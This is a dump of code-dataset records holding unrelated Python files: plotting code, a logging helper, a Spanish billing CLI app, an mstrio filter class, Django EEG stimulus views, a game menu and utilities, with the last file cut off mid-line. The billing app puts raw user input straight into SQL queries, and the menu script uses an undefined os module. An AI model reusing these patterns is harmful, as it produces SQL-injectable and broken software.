\r\n\r\n\r\n\r\n\r\nplt.plot(signal_error_reference, label='X_noise/X')\r\nplt.plot(signal_error_list, label='Signal/X')\r\nplt.title('signal error', fontsize=12)\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\nplt.plot(graph_error_list)\r\nplt.title('graph error', fontsize=12)\r\nplt.show()\r\n\r\n\r\n#plt.plot(trace1, label='signal/lap')\r\nplt.plot(trace2, label='signal/knn')\r\n#plt.plot(trace3, label='X/lap')\r\nplt.plot(trace4, label='X/knn')\r\nplt.plot(trace5, label='X_noise/knn')\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\n\r\ns=np.array(smoothness)\r\nfor i in range(len(s)):\r\n\tplt.plot(s[i], label='%s'%(i))\r\nplt.legend(loc=1)\r\nplt.show()\r\n\r\n\r\nreal_signal=X[0,:]\r\n#noise_signal=X\r\nlearned_signal=signals[0,:]\r\n\r\nreal_graph=create_networkx_graph(node_num, adj_matrix)\r\nedge_num=real_graph.number_of_edges()\r\nedge_weights=adj_matrix[np.triu_indices(node_num,0)]\r\nedge_color=edge_weights[edge_weights>0]\r\nedge_alpha=edge_color\r\nnodes=nx.draw_networkx_nodes(real_graph, knn_pos, node_color=real_signal,node_size=100, cmap=plt.cm.Reds)\r\nedges=nx.draw_networkx_edges(real_graph, knn_pos, width=1.0, alpha=1.0, edge_color=edge_color, edge_cmap=plt.cm.Blues)\r\nplt.axis('off')\r\nplt.show()\r\n\r\n\r\n\r\n#primal_adj=filter_graph_to_knn(primal_adj, node_num)\r\nprimal_adj[primal_adj<10**(-4)]=0\r\nlearned_graph=create_networkx_graph(node_num, primal_adj)\r\nedge_num=learned_graph.number_of_edges()\r\nedge_weights=primal_adj[np.triu_indices(node_num,0)]\r\nedge_color=edge_weights[edge_weights>0]\r\nedge_alpha=edge_color\r\nnodes=nx.draw_networkx_nodes(learned_graph, knn_pos, node_color=learned_signal,node_size=100, cmap=plt.cm.Reds)\r\nedges=nx.draw_networkx_edges(learned_graph, knn_pos, width=1.0, alpha=1.0, edge_color=edge_color, edge_cmap=plt.cm.Blues,)\r\nplt.axis('off')\r\nplt.show()\r\n\r\nplt.plot(error)\r\nplt.title('graph learning error', fontsize=12)\r\nplt.show()\r\n\r\n\r\nfig,(ax1, ax2)=plt.subplots(1,2, figsize=(4,2))\r\nax1.pcolor(adj_matrix, cmap='RdBu')\r\nax1.set_title('real W')\r\nax2.pcolor(primal_adj, cmap='RdBu')\r\nax2.set_title('learned w')\r\nplt.show()\r\n","sub_path":"gl_loop.py","file_name":"gl_loop.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"85773233","text":"import logging\nimport colorlog\n\nFORMATTER = '%(asctime)s - %(levelname)s - %(message)s'\nCOLOUR_FORMATTER = '%(log_color)s' + FORMATTER\n\ndef get_console_handler():\n console_handler = colorlog.StreamHandler()\n console_handler.setFormatter(colorlog.ColoredFormatter(COLOUR_FORMATTER))\n return console_handler\n\ndef get_file_handler():\n file_handler = logging.FileHandler('pi_system_metrics.log')\n file_handler.setFormatter(logging.Formatter(FORMATTER))\n return file_handler\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(get_console_handler())\n logger.addHandler(get_file_handler())\n return logger\n","sub_path":"pi_system_metrics/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"512724654","text":"from datetime import datetime\nimport os\nimport conexion\n# Definicion de clases\nclass Menu:\n def __init__(self, lstOpciones, strTitulo, strMenuDescr):\n self.lstOpciones = lstOpciones\n self.strTitulo = strTitulo\n self.strMenuDescr = strMenuDescr\n self.OptionSelect = 0\n def show(self):\n os.system(\"cls\")\n print(f\"\\033[1;32;40m\")\n print(20*\":\" + f\"{self.strTitulo:^20}\" + 20*\":\")\n print(20*\":\" + f\"{self.strMenuDescr:^20}\" + 20*\":\")\n for k, v in self.lstOpciones.items():\n print(k, \"::\", v)\n print(\"9 :: Salir\")\n while True:\n try:\n self.OptionSelect = int(input(\"Ingrese su opción: \"))\n if self.OptionSelect > 0 and self.OptionSelect < len(self.lstOpciones)+1:\n return self.OptionSelect\n elif self.OptionSelect == 9:\n break\n else:\n print(\"Ingrese alguna de las opciones mostradas\")\n except ValueError:\n print(\"Ingresa un número entero\")\nclass Factura:\n Fecha=\"\"\n ID=\"\"\n IGV=\"\"\n IDFAC=\"\"\n def create():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n Factura.ID = input(\"Escriba el ID del cliente a facturar: \")\n Factura.IGV = input(\"Ingrese el porcentaje de IGV a aplicar: \")\n Factura.Fecha = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n query = f\"insert into faccabecera (idCliente,igvFacCabecera,subtotalFacCabecera,totalFacCabecera,fechaFacCabecera,estadoFacCabecera) values ('{Factura.ID}', '{Factura.IGV}','0','0','{Factura.Fecha}','0');\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n def agregarProd():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n query = f\"SELECT idFacCabecera from faccabecera where fechaFacCabecera='{Factura.Fecha}'and idCliente='{Factura.ID}';\"\n resConn = conn.consultarBDD(query)\n Factura.IDFAC= resConn[0][0]\n idProducto= input(\"Ingrese el ID del producto a facturar: \")\n Cant = input(\"Ingresa la cantidad del producto a facturar: \")\n query = f\"select valorProducto from producto where idProducto= {idProducto};\"\n resConn = conn.consultarBDD(query)\n Precio = resConn[0][0]\n print(Precio)\n query = f\"insert into facdetalle(idFacCabecera,idProducto,cantFacDetalle,valorFacDetalle) values ('{Factura.IDFAC}','{idProducto}','{Cant}','{Precio}')\"\n resConn = conn.ejecutarBDD(query) \n def show():\n conn = conexion.conexionBDD(1)\n query = f\"select idFacCabecera,fechaFacCabecera,subtotalFacCabecera,igvFacCabecera,totalFacCabecera from faccabecera where idFacCabecera='{Factura.IDFAC}'\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tFecha\\t\\t\\t\\tSubtotal\\t\\tIGV\\t\\tTotal\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n query= f\"select nombreProducto, cantFacDetalle,valorFacDetalle from facdetalle t1 inner join producto t2 on t1.idProducto = t2.idProducto where idFacCabecera={Factura.IDFAC}\"\n print(\"\")\n print(\"\\t\\t\\tProducto\\t\\tCantidad\\t\\tDetalle\")\n resConn = conn.consultarBDD(query)\n for row in resConn:\n print(f\"\\t\\t\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\") \n input(\"continuar???\")\n def showall():\n conn = conexion.conexionBDD(1)\n query = f\"select idFacCabecera,fechaFacCabecera,subtotalFacCabecera,igvFacCabecera,totalFacCabecera from faccabecera\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tFecha\\t\\t\\t\\tSubtotal\\t\\tIGV\\t\\tTotal\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\nclass Cliente:\n def show():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\n def search():\n dni = int(input(\"Ingrese el DNI del cliente: \"))\n conn = conexion.conexionBDD(1)\n query = f\"select * from cliente where dniCliente = '{dni}';\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n input(\"continuar???\")\n def modify():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n id = input(\"Ingrese el id del cliente a modificar: \")\n dni = input(\"Ingrese el nuevo DNI: \")\n nombre = input(\"Escriba el nuevo nombre: \")\n apellido = input(\"Escriba el nuevo apellido: \")\n correo = input(\"Escriba el nuevo correo: \")\n query = f\"update cliente set dniCliente = '{dni}', nombreCliente = '{nombre}', apellidoCliente = '{apellido}', correoCliente = '{correo}' where idCliente = {id};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def create():\n conn = conexion.conexionBDD(1)\n dni = input(\"Ingrese el DNI del nuevo cliente: \")\n nombre = input(\"Escriba el nombre del nuevo cliente: \")\n apellido = input(\"Escriba el apellido del nuevo cliente: \")\n correo = input(\"Escriba el correo del nuevo cliente: \")\n query = f\"insert into cliente (dniCliente,nombreCliente,apellidoCliente,correoCliente) values ('{dni}','{nombre}','{apellido}','{correo}')\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def delete():\n conn = conexion.conexionBDD(1)\n query = \"select * from cliente;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tDNI\\t\\tNombre\\t\\tApellido\\t\\tCorreo\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\\t\\t{str(row[4])}\")\n idCliente = input(\"Ingrese el ID del cliente a eliminar: \")\n query = f\"delete from cliente where idCliente = {idCliente};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\nclass Producto:\n def show():\n conn = conexion.conexionBDD(1)\n query = \"select * from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n input(\"continuar???\")\n def search():\n id = int(input(\"Ingrese el ID del producto: \"))\n conn = conexion.conexionBDD(1)\n query = f\"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto where idProducto = '{id}';\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n input(\"continuar???\")\n def modify():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n idProducto = input(\"Ingrese el ID del producto a modificar: \")\n nombre = input(\"Escriba el nuevo nombre: \")\n valor = input(\"Escriba el nuevo valor: \")\n igv = input(\"Escriba si aplica IGV(1) o no aplica IGV(0) : \")\n query = f\"update producto set nombreProducto = '{nombre}', valorProducto = '{valor}',igvProducto = '{igv}' where idProducto = {idProducto};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def create():\n conn = conexion.conexionBDD(1)\n nombre = input(\"Escriba el nombre del nuevo producto: \")\n valor = input(\"Escriba el valor del nuevo producto: \")\n igv = input(\"Escriba si aplica IGV(1) o no aplica IGV(0) al nuevo producto: \")\n query = f\"insert into producto (nombreProducto, valorProducto, igvProducto) values ('{nombre}','{valor}','{igv}');\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n def delete():\n conn = conexion.conexionBDD(1)\n query = \"select idProducto, nombreProducto as Nombre, valorProducto as Valor, igvProducto as IGV from producto;\"\n resConn = conn.consultarBDD(query)\n print(\"\\tID\\t\\tNombre\\t\\t\\tValor\\t\\tIGV\")\n for row in resConn:\n print(f\"\\t{str(row[0])}\\t\\t{str(row[1])}\\t\\t{str(row[2])}\\t\\t{str(row[3])}\")\n idProducto = input(\"Ingrese el ID del producto a eliminar: \")\n query = f\"delete from producto where idProducto = {idProducto};\"\n resConn = conn.ejecutarBDD(query)\n if(resConn):\n print(\"Se ejecuto correctamente\")\n else:\n print(\"Hubo un error\")\n input(\"desea continuar???\")\n# Definición de todos los menus:\nmenuPrincipal = Menu({1: \"Crear Factura\", 2: \"Mantenimientos\"},\n \"VENTAS GROUP S.A.\", \"Menú Principal\")\nmenuFactura = Menu({1: \"Crear Factura\", 2: \"Ver todas las facturas\"},\n \"VENTAS GROUP S.A.\", \"Menú Factura\")\nmenuMantenimiento = Menu({1: \"Clientes\", 2: \"Productos\"},\n \"VENTAS GROUP S.A.\", \"Menú Mantenimiento\")\nmenuMantCliente = Menu({1: \"Mostrar todos los clientes\", 2: \"Buscar cliente por DNI\", 3: \"Modificar cliente\", 4: \"Crear Cliente\", 5: \"Borrar Cliente\"},\n \"VENTAS GROUP S.A.\", \"Menú Mantenimiento Clientes\")\nmenuMantProductos = Menu({1: \"Mostrar todos los productos\", 2 : \"Buscar producto por ID\", 3 : \"Modificar producto\", 4 : \"Crear Producto\", 5 : \"Borrar producto\"},\n \"VENTAS GROUP S.A.\", \"Menu mantenimiento Productos\")\n# Menu de navegación\nwhile True:\n intOptionSelect = menuPrincipal.show()\n if intOptionSelect == 1: # Menu Factura\n while True:\n intOptionSelect = menuFactura.show()\n if intOptionSelect == 1: # Crear factura\n Factura.create()\n Factura.agregarProd()\n while True:\n more = input(\"¿Desea agregar mas productos S/N: ?\")\n if more==\"S\":\n Factura.agregarProd()\n elif more ==\"N\":\n conn = conexion.conexionBDD(1)\n query = f\"select nombreProducto, cantFacDetalle,valorFacDetalle from facdetalle t1 inner join producto t2 on t1.idProducto = t2.idProducto where idFacCabecera='{Factura.IDFAC}'; \"\n resConn = conn.consultarBDD(query)\n acumulado = 0\n for i in resConn:\n acumulado += int(i[1])*int(i[2])\n acumuladototal = (acumulado+acumulado*int(Factura.IGV)/100)\n query = f\"update faccabecera set subtotalFacCabecera={acumulado}, totalFacCabecera={acumuladototal} where idFacCabecera='{Factura.IDFAC}'\"\n resConn = conn.ejecutarBDD(query)\n break\n else: \n print(\"Ingrese S o N\")\n Factura.show()\n elif intOptionSelect == 2: # Ver todas las Facturas\n Factura.showall()\n else:\n break\n elif intOptionSelect == 2: # Menu Mantenimiento\n while True:\n intOptionSelect = menuMantenimiento.show()\n if intOptionSelect == 1: # Mantenimiento Cliente\n while True:\n intOptionSelect = menuMantCliente.show()\n if intOptionSelect == 1: # Mostrar todos los clientes\n Cliente.show()\n elif intOptionSelect == 2: # Buscar cliente por DNI\n Cliente.show()\n elif intOptionSelect == 3: # Modificar cliente\n Cliente.modify()\n elif intOptionSelect == 4: # Crear Cliente\n Cliente.create()\n elif intOptionSelect == 5: # Borrar cliente\n Cliente.delete()\n else:\n break\n elif intOptionSelect == 2: # Mantenimiento Producto \n while True:\n intOptionSelect = menuMantProductos.show()\n if intOptionSelect == 1: # Mostrar todos los productos\n Producto.show()\n elif intOptionSelect == 2: # Buscar producto por ID\n Producto.search()\n elif intOptionSelect == 3: # Modificar producto\n Producto.modify()\n elif intOptionSelect == 4: # Crear producto\n Producto.create()\n elif intOptionSelect == 5: # Borrar producto\n Producto.delete()\n else:\n break\n else:\n break\n else:\n break\n","sub_path":"Semana6Hackaton/bporras/app/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":14985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506916316","text":"from typing import Dict, List, Optional, TYPE_CHECKING, Union\n\nfrom mstrio.access_and_security.security_filter import (LogicOperator, PredicateElementList,\n PredicateFilter, PredicateForm,\n PredicateJointElementList)\nfrom mstrio.utils.helper import Any, Dictable\n\nif TYPE_CHECKING:\n from mstrio.access_and_security.security_filter import PredicateBase\n from mstrio.connection import Connection\n\n\nclass Qualification(Dictable):\n \"\"\"The security filter definition written as an expression tree over\n predicate nodes.\n\n We do not attempt to represent the entire filter using expression nodes.\n Instead we use predicate nodes as leaves of the main tree expression.\n\n Most predicate nodes use a simple data structure. Security filter support\n five types of predicates, including: `PredicateCustomExpression`,\n `PredicateJointElementList`, `PredicateElementList`, `PredicateForm`,\n `PredicateFilter`. These simple predicates correspond to the most common\n qualifications that are used in security filters. It is possible to combine\n predicates using class `LogicOperator`.\n\n It is invalid for a security filter expression to contain no nodes.\n\n Attributes:\n tree (dict): security filter definition written as an expression tree\n over predicate nodes\n text (string): human readable description of the expression. It is\n generated from the current specification of the expression. This\n string will appear similar to a parsable description of the\n expression in the current user's locale. It is intended to be used\n to allow a user to easily distinguish between expressions. But this\n string cannot actually be used as input to a parser session because\n it does not contain hidden information about ambiguities in the\n parse text. Since this representation is not able to fully describe\n an expression, there is no point in the client ever sending it to\n the service.\n tokens (array of dicts): optional array, used if the expression is to\n be presented as a stream of tokens. When this representation is\n used by the service we would expect that the tokens would either\n completely parse the expression, or would describe an error in the\n parsing. When this representation is used by the client the tokens\n would either correspond to fresh text from the user (a `client`\n token) or to parts of the text that the user has not edited\n (a `parsed` token).\n \"\"\"\n\n def __init__(self, tree: Union[\"LogicOperator\", \"PredicateBase\"], text: Optional[str] = None,\n tokens: Optional[List[dict]] = None):\n self.tree = tree\n self.text = text\n self.tokens = tokens\n\n @classmethod\n def from_dict(cls, source: Dict[str, Any], connection: Optional[\"Connection\"] = None):\n tree = source.get(\"tree\")\n tree_type = tree.get(\"type\")\n if tree_type == \"predicate_form_qualification\":\n tree = PredicateForm.from_dict(tree, connection)\n elif tree_type == \"predicate_joint_element_list\":\n tree = PredicateJointElementList.from_dict(tree, connection)\n elif tree_type == \"predicate_filter_qualification\":\n tree = PredicateFilter.from_dict(tree, connection)\n elif tree_type == \"predicate_element_list\":\n tree = PredicateElementList.from_dict(tree, connection)\n elif tree_type == \"operator\":\n tree = LogicOperator.from_dict(tree, connection)\n else:\n tree = None\n new_source = source.copy()\n new_source[\"tree\"] = tree\n return super().from_dict(new_source, connection)\n","sub_path":"mstrio/access_and_security/security_filter/qualification.py","file_name":"qualification.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"379131272","text":"#-*- coding: utf-8 -*-\r\nimport datetime\r\nimport parallel\r\nfrom .modules import createstimuli\r\n\r\n\r\nfrom django.contrib import messages\r\nfrom django.shortcuts import render\r\n\r\nfrom eegbrowse.forms import LoginForm\r\nfrom eegbrowse.forms import NextForm\r\nfrom .modules.marker import baparallel\r\n\r\n\r\n# def hello(request):\r\n# text = \"\"\"

    welcome to my app !

    \"\"\"\r\n# return HttpResponse(text)\r\n\r\n\r\n# def hello(request):\r\n# today = datetime.datetime.now().date()\r\n# return render(request, \"hello.html\", {\"today\" : today})\r\np = parallel.Parallel()\r\np.setData(0)\r\n\r\ndef hello(request):\r\n today = datetime.datetime.now().date()\r\n daysOfWeek = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n return render(request, \"helloworld.html\", {\"today\": today, \"days_of_week\": daysOfWeek})\r\n\r\ndef image(request):\r\n if 'concepts_list' not in request.session:\r\n # print(\"I am here in the if\")\r\n concepts = createstimuli.get_concepts()\r\n concepts_list = createstimuli.create_shuffled_stimuli(concepts)\r\n request.session['concepts_list'] = concepts_list\r\n request.session['iteration'] = 0\r\n# print(\"These are the concepts: %s\" % concepts_list)\r\n else:\r\n# print(\"I am here in the else\")\r\n concepts_list = request.session['concepts_list']\r\n\r\n # print(\"These are the concepts: %s\" % request.session['concepts_list'])\r\n # print(\"This is the session: %s\" % request.session.keys())\r\n if request.session['iteration'] < len(concepts_list):\r\n mode = concepts_list[request.session['iteration']][0]\r\n concept = concepts_list[request.session['iteration']][1]\r\n request.session['iteration'] = request.session['iteration'] + 1\r\n iteration = request.session['iteration'] - 1\r\n \r\n i = iteration % 255 + 1\r\n print(\"Marker: %d\" % i)\r\n p.setData(i)\r\n return render(request, \"image.html\", {\"mode\": mode, \"concept\": concept.lower(), \"iteration\": iteration})\r\n else:\r\n return render(request, \"start.html\")\r\n\r\ndef sound(request):\r\n return render(request, \"sound.html\")\r\n\r\ndef text(request):\r\n return render(request, \"text.html\")\r\n\r\n\r\ndef start(request):\r\n request.session.flush()\r\n return render(request, \"start.html\")\r\n\r\n\r\ndef login(request):\r\n username = \"not logged in\"\r\n\r\n if request.method == \"POST\":\r\n # Get the posted form\r\n MyLoginForm = LoginForm(request.POST)\r\n if MyLoginForm.is_valid():\r\n username = MyLoginForm.cleaned_data['username']\r\n else:\r\n messages.error(request, \"Error\")\r\n else:\r\n MyLoginForm = LoginForm()\r\n\r\n return render(request, 'loggedin.html', {\"username\": username})\r\n\r\n","sub_path":"stimulipresenter/eegbrowse/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639259808","text":"import save\nimport sys\ndef menu():\n c=0\n a=1\n while c < a:\n optionen = (['weiter', 'Speichern', 'exit'])\n for i, x in enumerate(optionen):\n print(f\"{i+1}.\", x)\n aktion = int(input('\\nWähle deine Aktion '))\n if aktion == 1:\n break\n if aktion == 2:\n save.save()\n break\n if aktion == 3:\n os._exit(1)\nmenu()\n","sub_path":"spielermenu.py","file_name":"spielermenu.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"621462195","text":"# Various Utility Functions to be used elsewhere\nimport string\nimport re\nimport json\nimport random\nfrom collections import defaultdict\nimport os\nfrom os.path import join\nimport sys\nimport logging\n# import gensim\nimport pickle\n\nimport numpy as np\nimport torch\nfrom torch.nn import DataParallel\n\nfrom src.utils.file import FileObjectStore\n\n# Leave this here to prevent circular imports!\ndef np_to_tensor(a):\n if isinstance(a, np.ndarray):\n return torch.from_numpy(a)\n else:\n return a\n\nuse_cuda = torch.cuda.is_available()\nRE_WS_PRE_PUCT = re.compile(u'\\s+([^a-zA-Z\\d])')\nRE_WIKI_ENT = re.compile(r'.*wiki\\/(.*)')\nRE_WS = re.compile('\\s+')\n\nlogger = logging.getLogger(__name__)\n\n\ndef gen_wrapper(gen):\n while True:\n try:\n yield next(gen)\n except StopIteration:\n raise\n except Exception as e:\n print(e)\n pass\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef relu(x):\n x_c = x.copy()\n x_c[x_c < 0] = 0\n return x_c\n\n\ndef PCA(x, k=2):\n x_mean = np.mean(x,0)\n x = x - x_mean\n u, s, v = np.linalg.svd(x.T)\n\n return x @ u[:, :k]\n\n\ndef normal_initialize(dim_0=1000, dim_1=16):\n \"\"\"Initialize with normal distribution of std = 1 / sqrt(dim_1). Set O index to all zeros.\"\"\"\n stdv = 1 / np.sqrt(dim_1)\n embs = np.random.normal(0, scale=stdv, size=(dim_0, dim_1))\n embs[0] = 0\n\n return embs\n\n\ndef normalize(v):\n if len(v.shape) == 1:\n return v / (np.linalg.norm(v) + 10**-11)\n elif len(v.shape) == 2:\n norm = np.linalg.norm(v, axis=1) + 10**-11\n return v / norm[:, None]\n else:\n print(\"normalize only accepts arrays of dimensions 1 or 2.\")\n sys.exit(1)\n\n\ndef list_line_locations(filename):\n line_offset = []\n offset = 0\n with open(filename, \"rb\") as f:\n for line in f:\n line_offset.append(offset)\n offset += len(line)\n return line_offset\n\n\ndef reverse_dict(d):\n\n return {v: k for k, v in d.items()}\n\n\ndef normalise_form(sf):\n sf = sf.lower()\n sf = RE_WS_PRE_PUCT.sub(r'\\1', sf)\n sf = RE_WS.sub(' ', sf)\n return sf\n\n\ndef iter_derived_forms(sf):\n yield sf\n yield sf.replace(\"'s\", \"\")\n yield ''.join(c for c in sf if not c in string.punctuation)\n\n if sf.startswith('The') or sf.startswith('the'):\n yield sf[4:]\n\n comma_parts = sf.split(',')[:-1]\n for i in range(len(comma_parts)):\n yield ''.join(comma_parts[:i + 1])\n if comma_parts:\n yield ''.join(comma_parts)\n\n colon_idx = sf.find(':')\n if colon_idx != -1:\n yield sf[:colon_idx]\n\n\ndef get_normalised_forms(sf):\n return set(normalise_form(f) for f in iter_derived_forms(sf))\n\n\ndef equalize_len(data, max_size, pad=0):\n d = data.copy()\n l = len(d)\n\n if l >= max_size:\n return d[:max_size]\n else:\n for _ in range(max_size - l):\n d.append(pad)\n\n return d\n\n\ndef equalize_len_w_eot(data, max_size, eot=None):\n l = len(data)\n arr = np.zeros(max_size, dtype=np.int64)\n\n if l >= max_size:\n arr[:max_size] = data[:max_size]\n arr[max_size - 1] = eot\n else:\n arr[:l] = data\n arr[l] = eot\n\n return arr\n\n\ndef str2bool(v):\n \"\"\"\n thanks : https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse\n \"\"\"\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n\n\ndef load_file_stores(data_path):\n dict_names = ['ent_dict', 'word_dict', 'redirects', 'str_prior', 'str_cond', 'disamb', 'str_necounts']\n file_stores = {}\n for dict_name in dict_names:\n file_stores[dict_name] = FileObjectStore(join(data_path, f'mmaps/{dict_name}'))\n\n return file_stores\n\n\ndef send_to_cuda(device, model):\n if isinstance(device, tuple):\n model = DataParallel(model, device)\n model = model.to(device[0])\n else:\n model = model.cuda(device)\n\n return model\n\n\ndef get_absolute_pos(word_sequences):\n batch = np.zeros_like(word_sequences, dtype=np.int64)\n for i, word_seq in enumerate(word_sequences):\n start_idx = 1\n for j, pos in enumerate(word_seq):\n if int(pos) == 0:\n batch[i, j] = 0\n else:\n batch[i, j] = start_idx\n start_idx += 1\n return torch.from_numpy(batch)\n\n\ndef probe(d, n=10):\n\n for i, (k, v) in enumerate(d.items()):\n if i == n:\n break\n print(k, v)\n\n\ndef check_errors(I, gold, gram_indices, rev_ent_dict, rev_gram_dict, redirects, ks):\n errors = defaultdict(list)\n\n for j, k in enumerate(ks):\n for i in range(I.shape[0]):\n if gold[i] not in I[i, :k]:\n errors[k].append((i, gold[i], I[i]))\n\n for k, errors in errors.items():\n print(\"Top {} errors:\".format(k))\n mask = random.sample(range(len(errors)), 10)\n for i in mask:\n mention_idx, gold_id, predictions_id = errors[i]\n mention_tokens = gram_indices[mention_idx]\n predictions = ','.join([rev_ent_dict.get(ent_id, '') for ent_id in predictions_id][:10])\n\n mention_grams = []\n for token_idx, token in enumerate(mention_tokens):\n if token == 0:\n break\n elif token in rev_gram_dict:\n mention_grams.append(rev_gram_dict[token][0])\n mention = ''.join(mention_grams)\n if token_idx > 0:\n last_gram = rev_gram_dict.get(mention_tokens[token_idx-1], '')\n if len(last_gram) > 1:\n mention += last_gram[1:]\n\n print('{}|{}|{}'.format(mention, rev_ent_dict.get(gold_id, ''), predictions))\n print()\n\n\ndef eval_ranking(I, gold, ks):\n out = {k: 0 for k in ks}\n\n for k in ks:\n for i in range(I.shape[0]):\n if gold[i] in I[i, :k]:\n out[k] += 1\n\n out = {k: v / I.shape[0] for k, v in out.items()}\n\n # Mean Reciprocal Rank\n ranks = []\n for i in range(I.shape[0]):\n index = np.where(gold[i] == I[i])[0] + 1\n if not index:\n ranks.append(1 / I.shape[1])\n else:\n ranks.append(1 / index)\n mrr = np.mean(np.array(ranks))\n\n if not isinstance(mrr, float):\n mrr = mrr[0]\n\n out['mrr'] = mrr\n\n return out\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef create_arr(strs, max_char, char_dict, ent2id=None):\n dim_0 = len(strs) + 1 if ent2id else len(strs)\n arr = np.zeros((dim_0, max_char), dtype=np.int64)\n\n for i, s in enumerate(strs):\n char_ids = [char_dict[char] for char in list(s.replace('_', ' '))]\n index = ent2id.get(s, 